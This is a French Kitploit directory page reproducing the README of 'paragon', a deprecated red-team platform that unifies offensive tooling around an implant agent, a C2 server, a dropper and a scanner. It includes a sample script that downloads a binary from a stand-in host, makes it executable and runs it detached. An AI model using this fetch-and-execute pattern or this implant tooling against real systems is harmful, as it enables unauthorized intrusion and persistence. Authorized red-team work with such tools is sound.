Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
paragon — Plateforme d'engagement Red Team visant à unifier les outils offensifs derrière une interface utilisateur simple. | Kitploit
Outils/GitHubGitHub/kcarretto/paragon
Frameworks de Tests d'IntrusionFrameworks d'ExploitationScripting et AutomatisationPost-ExploitationCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubkcarretto/paragon

paragon

Plateforme d'engagement Red Team visant à unifier les outils offensifs derrière une interface utilisateur simple.

Voir le dépôt
3044219il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Avis de dépréciation

Ce projet a été déprécié, veuillez vous référer à notre nouveau projet Realm, qui s'appuie sur de nombreuses idées que nous avions lors de la construction de ce dépôt.

CI Build Status Go Report Card Coverage Status GitHub release GoDoc

Paragon

Demo

Paragon est une plateforme d'engagement Red Team. Elle vise à unifier les outils offensifs derrière une interface utilisateur simple, en abstraisant une grande partie du travail backend pour permettre aux opérateurs de se concentrer sur l'écriture d'implants et de passer moins de temps à s'inquiéter des bases de données et du CSS. Le dépôt fournit également quelques outils offensifs déjà intégrés à Paragon qui peuvent être utilisés lors des engagements.

Ce dépôt est encore en développement intense et n'est pas prêt pour une utilisation en production. Lorsqu'il sera considéré comme stable, un tag V1.0.0 sera publié. Jusque-là, l'API pourra subir des changements cassants alors que nous simplifions continuellement notre conception. Veuillez lire la documentation développeur ci-dessous si vous souhaitez nous aider à atteindre ce jalon plus rapidement.

Table des matières

  • Points forts
  • Pour commencer
  • Aperçu des composants
  • FAQ
  • Terminologie
  • Guide du développeur

Points forts

  • Intégrez facilement des outils personnalisés pour unifier les opérations derrière une interface unique
  • Interrogez le graphe de connaissances Red Team à l'aide de l'API GraphQL fournie
  • Émission d'événements pour une automatisation à faible latence et un traitement en temps réel
  • Langage de script de type Python pour les déploiements, la post-exploitation, et plus
  • Implants multiplateformes et déploiement inclus
  • Enregistrez l'activité des opérateurs pour l'agréger commodément dans un rapport post-engagement pour examen

Pour commencer

Une instance de démonstration rapide peut être configurée en clonant le dépôt et en exécutant docker-compose up. Ouvrez 127.0.0.1:80 dans votre navigateur pour commencer !

Les images utilisées sont disponibles sur docker-hub, et peuvent être configurées à partir d'un fichier docker-compose pour un déploiement en production.

Aperçu des composants

Langage de script

La plupart des composants de ce dépôt reposent sur un langage de script de type Python qui permet un contrôle puissant et une personnalisation de leur comportement. Le langage est une version modifiée de Starlark de Google, étendu avec des fonctionnalités multiplateformes pour les opérateurs. Cela permet également aux outils comme l'agent et le dropper (discutés ci-dessous) d'exécuter des tâches sans dépendre des binaires système (curl, bash, etc.). Toutes les opérations sont exécutées sous forme de code en Go, ce qui rend intuitif l'ajout de fonctionnalités supplémentaires à l'environnement de script. Voici un exemple de script :

# Download a file via https, execute it, and don't keep it as a child process.
load("sys", "request")

new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)

# set new_bin permissions to 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)

Reference

Teamserver

Fournit une application web simple et une API GraphQL pour interfacer avec un graphe de connaissances Red Team, unifiant les outils derrière une source de vérité centralisée et abstraisant de nombreuses préoccupations backend fastidieuses pour les opérateurs. Intégrez vos outils personnalisés avec le Teamserver (via l'API GraphQL ou les abonnements aux événements) pour gagner du temps sur le travail backend. Le Teamserver enregistre toute l'activité, donc avec tous vos outils unifiés en un seul endroit, la rédaction de rapports post-engagement devient beaucoup plus facile.

Outils intégrés

Les outils ci-dessous sont également inclus dans le dépôt. Ils peuvent facilement être étendus pour s'adapter à de nombreux cas d'utilisation multiplateformes.

Dropper

  • Entièrement multiplateforme
  • Compile statiquement les ressources en un seul binaire
  • Fournit un langage de script de type Python pour la configuration de déploiement personnalisée

Paragon fournit un outil pour empaqueter des ressources (binaires, scripts, etc.) en un seul binaire qui, lorsqu'il est exécuté, exécutera votre script de déploiement personnalisé pouvant écrire des ressources sur le système de fichiers, lancer des processus, télécharger des fichiers, gérer les erreurs, etc. Il est entièrement multiplateforme et compilé statiquement, offrant des déploiements fiables. Si vous souhaitez étendre ses fonctionnalités, vous pouvez simplement étendre le fichier Go généré avant la compilation.

Agent

  • Entièrement multiplateforme
  • Fournit un langage de script de type Python pour la post-exploitation
  • Mécanismes de communication modulaires, compilez seulement ce dont vous avez besoin
    • Utilisez plusieurs options pour assurer des rappels fiables
  • Personnalisez la façon dont l'agent gère les échecs de communication

Un implant qui exécute des tâches et rapporte les résultats d'exécution. Il est configuré par défaut pour exécuter des tâches en utilisant le langage de script de type Python de Paragon et pour communiquer avec un C2 via http(s). Il est écrit en Go et peut être rapidement modifié pour ajouter de nouvelles méthodes de transport (par exemple, DNS), des options d'exécution, une logique de basculement, etc.

C2

  • Déploiement léger
  • Hautement performant, capable de gérer des milliers d'agents
    • Dépend des ressources système et de la bande passante disponible
  • Service distribué, utilisez autant de C2 que vous le souhaitez

Agit comme intermédiaire entre l'Agent et le Teamserver. Il gère les rappels d'agents pour divers mécanismes de communication et lui fournit de nouvelles tâches depuis la file d'attente du teamserver.

Runner

  • Exécution de tâches à faible latence et en temps réel
  • Facilement étendu pour ajouter la prise en charge de plus de mécanismes de communication
  • Service distribué, utilisez autant de runners que vous le souhaitez

Au lieu d'attendre un rappel, certaines situations peuvent nécessiter une connexion directe pour exécuter rapidement une tâche et voir son résultat. Le runner y parvient en s'abonnant aux files d'attente de tâches et en établissant une connexion à la machine cible (par exemple en utilisant SSH). Cela permet aux intégrations de type shell d'utiliser la même interface que les implants et les C2. Cela permet également de réaliser le déploiement initial de l'implant via cette interface.

Scanner

  • Surveiller les services cibles accessibles
  • Automatiser les réponses lorsque les services deviennent (in)disponibles
  • Fournir des informations réseau au graphe de connaissances, qui peuvent être utilisées par d'autres outils
  • Service distribué, utilisez autant de scanners que vous le souhaitez
Télécharger l’outil